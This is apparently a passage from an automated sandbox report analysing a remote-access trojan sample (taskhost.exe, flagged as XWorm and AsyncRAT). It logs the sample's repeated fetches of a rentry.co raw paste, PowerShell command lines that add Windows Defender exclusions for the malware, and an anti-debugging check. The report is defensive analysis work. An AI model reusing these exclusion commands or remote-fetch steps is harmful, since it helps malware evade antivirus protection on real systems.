                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1601&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1713615&cwnd=193&unsent_bytes=0&cid=155000c2e1fe942f&ts=819&x=0"
                                                              2024-12-13 10:50:26 UTC496INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:26 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://r
                                                              2024-12-13 10:50:26 UTC1369INData Raw: 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75
                                                              Data Ascii: .matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribu
                                                              2024-12-13 10:50:26 UTC1226INData Raw: 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20
                                                              Data Ascii: mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.749982104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:29 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:50:30 UTC867INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:30 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPOZKN2WGTx7QfyU3xgbjzRj6167uvazt4QRFCAY1F27BqP3m06Dmo0XI%2FRPKPyxv9lY6owiE86EzU9RwkWehozZE9M%2BiHCxRaOfzIN2RIXxbjUNq31Qec0KXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1564c03a468c09-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1967&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1444114&cwnd=240&unsent_bytes=0&cid=accc3f17bacb2c88&ts=794&x=0"
                                                              2024-12-13 10:50:30 UTC502INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:30 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:50:30 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:50:30 UTC1220INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.749992104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:32 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:50:33 UTC869INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:33 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aj3VBETi6hfMikszMAntU5hd6ImUas9hTLVsGIXXBriA9mcRV%2FW4BX7OTvx0UfUnfT2RQ5wmhtA7GFwGpk%2FJdlOpAwut%2F51EI5Qd0PKimnaV2igWxaSldGTbjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1564d4ebf04294-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1561&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1795817&cwnd=213&unsent_bytes=0&cid=48c9e8cbea42e50b&ts=573&x=0"
                                                              2024-12-13 10:50:33 UTC500INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:33 UTC1369INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentr
                                                              2024-12-13 10:50:33 UTC1369INData Raw: 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27
                                                              Data Ascii: ches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('
                                                              2024-12-13 10:50:33 UTC1222INData Raw: 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20
                                                              Data Ascii: e"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:05:48:23
                                                              Start date:13/12/2024
                                                              Path:C:\Users\user\Desktop\taskhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\taskhost.exe"
                                                              Imagebase:0xb00000
                                                              File size:63'488 bytes
                                                              MD5 hash:3296704171FE01C0FC4FCDD02F2695CA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:8
                                                              Start time:05:48:29
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'
                                                              Imagebase:0x7c0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:05:48:29
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:05:48:44
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
                                                              Imagebase:0x7ff741d30000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:05:48:44
                                                              Start date:13/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:16%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:100%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 2278 7ffaac916c01 2279 7ffaac916c4e CheckRemoteDebuggerPresent 2278->2279 2281 7ffaac916cbf 2279->2281

                                                                Executed Functions

                                                                Function 00007FFAAC911511 Relevance: 5.4, Strings: 4, Instructions: 390COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2556684819.00007FFAAC910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC910000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffaac910000_taskhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$6$6$6
                                                                • API String ID: 0-3214027553
                                                                • Opcode ID: 2d772e064a6424b963e57a74a56cdb2797e70ca51106a58bf8080c6cd7368c41
                                                                • Instruction ID: 4bd85c484f4a90cec527f21a2d247cf129ec89674d093b03578f30b491b7c42c
                                                                • Opcode Fuzzy Hash: 2d772e064a6424b963e57a74a56cdb2797e70ca51106a58bf8080c6cd7368c41
                                                                • Instruction Fuzzy Hash: B1C19165B1DA499FFBC8EB3884566B977D2EF99300F1481B9D04EC3292DF28E8458781
                                                                Function 00007FFAAC916C01 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 262 7ffaac916c01-7ffaac916cbd CheckRemoteDebuggerPresent 265 7ffaac916cbf 262->265 266 7ffaac916cc5-7ffaac916d08 262->266 265->266
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2556684819.00007FFAAC910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC910000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffaac910000_taskhost.jbxd
                                                                Similarity
                                                                • API ID: CheckDebuggerPresentRemote
                                                                • String ID:
                                                                • API String ID: 3662101638-0
                                                                • Opcode ID: 358f90e6ac178ded318967924b938a81e8cbd13dd0b29fd43e74ee0ccc85e87c
                                                                • Instruction ID: d91ebb48132b29d29bffb243d8df494564d84d5a5d4d89d2da07213badda0c2b
                                                                • Opcode Fuzzy Hash: 358f90e6ac178ded318967924b938a81e8cbd13dd0b29fd43e74ee0ccc85e87c
                                                                • Instruction Fuzzy Hash: 3131133190875C8FCB58DF68C88ABE97BE0EF65311F0442AFD489D7252DB34A846CB91
                                                                Function 00007FFAAC915656 Relevance: .5, Instructions: 475COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 356 7ffaac915656-7ffaac915663 357 7ffaac91566e-7ffaac915737 356->357 358 7ffaac915665-7ffaac91566d 356->358 362 7ffaac9157a3 357->362 363 7ffaac915739-7ffaac915742 357->363 358->357 364 7ffaac9157a5-7ffaac9157ca 362->364 363->362 365 7ffaac915744-7ffaac915750 363->365 371 7ffaac9157cc-7ffaac9157d5 364->371 372 7ffaac915836 364->372 366 7ffaac915752-7ffaac915764 365->366 367 7ffaac915789-7ffaac9157a1 365->367 369 7ffaac915766 366->369 370 7ffaac915768-7ffaac91577b 366->370 367->364 369->370 370->370 373 7ffaac91577d-7ffaac915785 370->373 371->372 374 7ffaac9157d7-7ffaac9157e3 371->374 375 7ffaac915838-7ffaac9158e0 372->375 373->367 376 7ffaac91581c-7ffaac915834 374->376 377 7ffaac9157e5-7ffaac9157f7 374->377 386 7ffaac91594e 375->386 387 7ffaac9158e2-7ffaac9158ec 375->387 376->375 378 7ffaac9157fb-7ffaac91580e 377->378 379 7ffaac9157f9 377->379 378->378 381 7ffaac915810-7ffaac915818 378->381 379->378 381->376 389 7ffaac915950-7ffaac915979 386->389 387->386 388 7ffaac9158ee-7ffaac9158fb 387->388 390 7ffaac9158fd-7ffaac91590f 388->390 391 7ffaac915934-7ffaac91594c 388->391 396 7ffaac91597b-7ffaac915986 389->396 397 7ffaac9159e3 389->397 392 7ffaac915911 390->392 393 7ffaac915913-7ffaac915926 390->393 391->389 392->393 393->393 395 7ffaac915928-7ffaac915930 393->395 395->391 396->397 398 7ffaac915988-7ffaac915996 396->398 399 7ffaac9159e5-7ffaac915a76 397->399 400 7ffaac9159cf-7ffaac9159e1 398->400 401 7ffaac915998-7ffaac9159aa 398->401 407 7ffaac915a7c-7ffaac915a8b 399->407 400->399 402 7ffaac9159ac 401->402 403 7ffaac9159ae-7ffaac9159c1 401->403 402->403 403->403 405 7ffaac9159c3-7ffaac9159cb 403->405 405->400 408 7ffaac915a8d 407->408 409 7ffaac915a93-7ffaac915af8 call 7ffaac915b14 407->409 408->409 416 7ffaac915afa 409->416 417 7ffaac915aff-7ffaac915b13 409->417 416->417
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2556684819.00007FFAAC910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC910000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffaac910000_taskhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de0b36c5210be24e563c39a1365c0f2eaa6aceb55cd021e11adebad9669532c7
